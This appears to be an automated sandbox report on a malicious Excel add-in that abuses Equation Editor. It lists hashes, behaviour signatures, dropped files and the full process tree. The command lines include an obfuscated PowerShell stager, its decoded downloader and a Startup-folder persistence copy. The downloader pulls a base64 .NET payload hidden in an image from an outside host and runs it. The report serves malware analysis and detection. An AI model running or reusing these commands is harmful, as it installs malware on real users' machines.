Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    15/08/2023, 12:42

General

  • Target

    NUEVO PEDIDO - CF0002.xlam

  • Size

    624KB

  • MD5

    5689ad77747f797c7fce700583f816a4

  • SHA1

    0c50fdc9f2e15c8a08c55d4eb4677282e544de4d

  • SHA256

    dc7443935ed909e177df4ee104aa44d63ae47cf482b2d03fe0cff0bc3a1fbfc7

  • SHA512

    6a139d6f80025b4a1518a7178e47366c0176e1e6a73017cb044380ab51a06aaab80e7d2f69d25d673abf463cdf2abe03dc4e1beb6c59926fe4a3afc90da33cd2

  • SSDEEP

    12288:ITIKpW2H8A00G0lx3dgcxaCnF/FrIVN7CbT3AR3fkO15GrnxV60fus/y2:EIKpW2H8A/b3aK5IRfDdCl/y2

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

exe.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Drops startup file 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\NUEVO PEDIDO - CF0002.xlam"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1276
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\xauixgpo.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\xauixgpo.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ qO.vbs')"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2740
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          4⤵
          • Runs ping.exe
          PID:2724
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\xauixgpo.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ qO.vbs')"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2432
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Roaming\xauixgpo.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ qO.vbs')
            5⤵
            • Drops startup file
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2456
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DY#@$#Mw#@$#v#@$#DY#@$#Mg#@$#x#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#dQBu#@$#Gk#@$#dgBl#@$#HI#@$#cwBv#@$#F8#@$#dgBi#@$#HM#@$#LgBq#@$#H#@$##@$#ZQBn#@$#D8#@$#MQ#@$#2#@$#Dk#@$#M#@$##@$#5#@$#DM#@$#MQ#@$#4#@$#DU#@$#NQ#@$#n#@$#Ds#@$#J#@$#B3#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#g#@$#D0#@$#I#@$#BO#@$#GU#@$#dw#@$#t#@$#E8#@$#YgBq#@$#GU#@$#YwB0#@$#C#@$##@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBO#@$#GU#@$#d#@$##@$#u#@$#Fc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#LgBE#@$#G8#@$#dwBu#@$#Gw#@$#bwBh#@$#GQ#@$#R#@$#Bh#@$#HQ#@$#YQ#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FU#@$#cgBs#@$#Ck#@$#Ow#@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBU#@$#GU#@$#e#@$#B0#@$#C4#@$#RQBu#@$#GM#@$#bwBk#@$#Gk#@$#bgBn#@$#F0#@$#Og#@$#6#@$#FU#@$#V#@$#BG#@$#Dg#@$#LgBH#@$#GU#@$#d#@$#BT#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#FM#@$#V#@$#BB#@$#FI#@$#V#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#EU#@$#TgBE#@$#D4#@$#Pg#@$#n#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#p#@$#Ds#@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#Ek#@$#bgBk#@$#GU#@$#e#@$#BP#@$#GY#@$#K#@$##@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwBl#@$#C#@$##@$#M#@$##@$#g#@$#C0#@$#YQBu#@$#GQ#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwB0#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#Kw#@$#9#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#u#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#I#@$##@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#Ow#@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#FM#@$#dQBi#@$#HM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Cw#@$#I#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ck#@$#Ow#@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBD#@$#G8#@$#bgB2#@$#GU#@$#cgB0#@$#F0#@$#Og#@$#6#@$#EY#@$#cgBv#@$#G0#@$#QgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#KQ#@$#7#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBS#@$#GU#@$#ZgBs#@$#GU#@$#YwB0#@$#Gk#@$#bwBu#@$#C4#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#F0#@$#Og#@$#6#@$#Ew#@$#bwBh#@$#GQ#@$#K#@$##@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#Ck#@$#Ow#@$#k#@$#HQ#@$#eQBw#@$#GU#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bs#@$#G8#@$#YQBk#@$#GU#@$#Z#@$#BB#@$#HM#@$#cwBl#@$#G0#@$#YgBs#@$#Hk#@$#LgBH#@$#GU#@$#d#@$#BU#@$#Hk#@$#c#@$#Bl#@$#Cg#@$#JwBG#@$#Gk#@$#YgBl#@$#HI#@$#LgBI#@$#G8#@$#bQBl#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C4#@$#RwBl#@$#HQ#@$#TQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#K#@$##@$#n#@$#FY#@$#QQBJ#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#YQBy#@$#Gc#@$#dQBt#@$#GU#@$#bgB0#@$#HM#@$#I#@$##@$#9#@$#C#@$##@$#L#@$##@$#o#@$#Cc#@$#d#@$#B4#@$#HQ#@$#LgBw#@$#Gk#@$#ZgB6#@$#HY#@$#YgBu#@$#C8#@$#O#@$##@$#0#@$#DI#@$#Lg#@$#x#@$#DU#@$#Lg#@$#2#@$#Dc#@$#Lg#@$#w#@$#Dg#@$#Lw#@$#v#@$#Do#@$#c#@$#B0#@$#HQ#@$#a#@$##@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C4#@$#SQBu#@$#HY#@$#bwBr#@$#GU#@$#K#@$##@$#k#@$#G4#@$#dQBs#@$#Gw#@$#L#@$##@$#g#@$#CQ#@$#YQBy#@$#Gc#@$#dQBt#@$#GU#@$#bgB0#@$#HM#@$#KQ#@$#=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1052
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.pifzvbn/842.15.67.08//:ptth');$method.Invoke($null, $arguments)"
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2260

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    644a53658a2cf4c7d09ef1b40a0e18c5

    SHA1

    f09659fd97960ee065a07865b8f4672442bf36f0

    SHA256

    3e8410a9db787cf3c3ac9a5be89c59d616d79e200a64ac40a65eba62d1e29a36

    SHA512

    627c19d1cb33623e4298363ac9208058cb7cd329392cf094a63021fb137e76fa52e783c528b5cc82062bdbbf1574697b17961479289f20e612e015561ecedaa5

  • C:\Users\Admin\AppData\Local\Temp\CabE774.tmp

    Filesize

    62KB

    MD5

    3ac860860707baaf32469fa7cc7c0192

    SHA1

    c33c2acdaba0e6fa41fd2f00f186804722477639

    SHA256

    d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

    SHA512

    d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

  • C:\Users\Admin\AppData\Local\Temp\TarE823.tmp

    Filesize

    164KB

    MD5

    4ff65ad929cd9a367680e0e5b1c08166

    SHA1

    c0af0d4396bd1f15c45f39d3b849ba444233b3a2

    SHA256

    c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

    SHA512

    f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0122F2NOX119Z51U13F8.temp

    Filesize

    7KB

    MD5

    b0f7b0d02aa783330feab29dc079d989

    SHA1

    192daf35177e2ce7f8e8e8bc456ef3c9cbde006b

    SHA256

    31d7dee5276bca2a726bfadf43d748e8962096094cfd6f6085c005469b797935

    SHA512

    b07f0de370f2722185c022a85f87b9b66fa92a16b1665b2175425928347d7d215cc4c941aa9a2ec7188600b1af4c8697a00deb78717b525a69a3f71dbb60a747

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    b0f7b0d02aa783330feab29dc079d989

    SHA1

    192daf35177e2ce7f8e8e8bc456ef3c9cbde006b

    SHA256

    31d7dee5276bca2a726bfadf43d748e8962096094cfd6f6085c005469b797935

    SHA512

    b07f0de370f2722185c022a85f87b9b66fa92a16b1665b2175425928347d7d215cc4c941aa9a2ec7188600b1af4c8697a00deb78717b525a69a3f71dbb60a747

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    b0f7b0d02aa783330feab29dc079d989

    SHA1

    192daf35177e2ce7f8e8e8bc456ef3c9cbde006b

    SHA256

    31d7dee5276bca2a726bfadf43d748e8962096094cfd6f6085c005469b797935

    SHA512

    b07f0de370f2722185c022a85f87b9b66fa92a16b1665b2175425928347d7d215cc4c941aa9a2ec7188600b1af4c8697a00deb78717b525a69a3f71dbb60a747

  • C:\Users\Admin\AppData\Roaming\xauixgpo.vbs

    Filesize

    175KB

    MD5

    a04e4560531355ddc70126e4b7d6eed7

    SHA1

    345034f52ae0b13ea902fdb7df3e69f005175bcc

    SHA256

    19606bd36344ea38ee7b2883ffc2eb5a8adf25639d9335efc7ba05c7b8e2cde5

    SHA512

    14e16b2a28c559b94188fd5006027a3d840ce82e3e13bca22135a1c6fa91ddf714e4ecdd67281d90bdebf863bf20fb63569afefe3c5bf52c78dc63365f05d650

  • C:\Users\Admin\AppData\Roaming\xauixgpo.vbs

    Filesize

    175KB

    MD5

    a04e4560531355ddc70126e4b7d6eed7

    SHA1

    345034f52ae0b13ea902fdb7df3e69f005175bcc

    SHA256

    19606bd36344ea38ee7b2883ffc2eb5a8adf25639d9335efc7ba05c7b8e2cde5

    SHA512

    14e16b2a28c559b94188fd5006027a3d840ce82e3e13bca22135a1c6fa91ddf714e4ecdd67281d90bdebf863bf20fb63569afefe3c5bf52c78dc63365f05d650

  • memory/1052-89-0x000000006C790000-0x000000006CD3B000-memory.dmp

    Filesize

    5.7MB

  • memory/1052-79-0x00000000028C0000-0x0000000002900000-memory.dmp

    Filesize

    256KB

  • memory/1052-159-0x000000006C790000-0x000000006CD3B000-memory.dmp

    Filesize

    5.7MB

  • memory/1052-77-0x000000006C790000-0x000000006CD3B000-memory.dmp

    Filesize

    5.7MB

  • memory/1052-78-0x000000006C790000-0x000000006CD3B000-memory.dmp

    Filesize

    5.7MB

  • memory/1052-80-0x00000000028C0000-0x0000000002900000-memory.dmp

    Filesize

    256KB

  • memory/1276-68-0x000000007408D000-0x0000000074098000-memory.dmp

    Filesize

    44KB

  • memory/1276-54-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1276-162-0x000000007408D000-0x0000000074098000-memory.dmp

    Filesize

    44KB

  • memory/1276-161-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1276-55-0x000000007408D000-0x0000000074098000-memory.dmp

    Filesize

    44KB

  • memory/2260-158-0x000000006C790000-0x000000006CD3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2260-90-0x000000006C790000-0x000000006CD3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2260-88-0x000000006C790000-0x000000006CD3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2260-87-0x000000006C790000-0x000000006CD3B000-memory.dmp

    Filesize

    5.7MB

  • memory/2456-66-0x000000006C670000-0x000000006CC1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2456-67-0x00000000025D0000-0x0000000002610000-memory.dmp

    Filesize

    256KB

  • memory/2456-65-0x000000006C670000-0x000000006CC1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2456-71-0x000000006C670000-0x000000006CC1B000-memory.dmp

    Filesize

    5.7MB

  • memory/2456-69-0x00000000025D0000-0x0000000002610000-memory.dmp

    Filesize

    256KB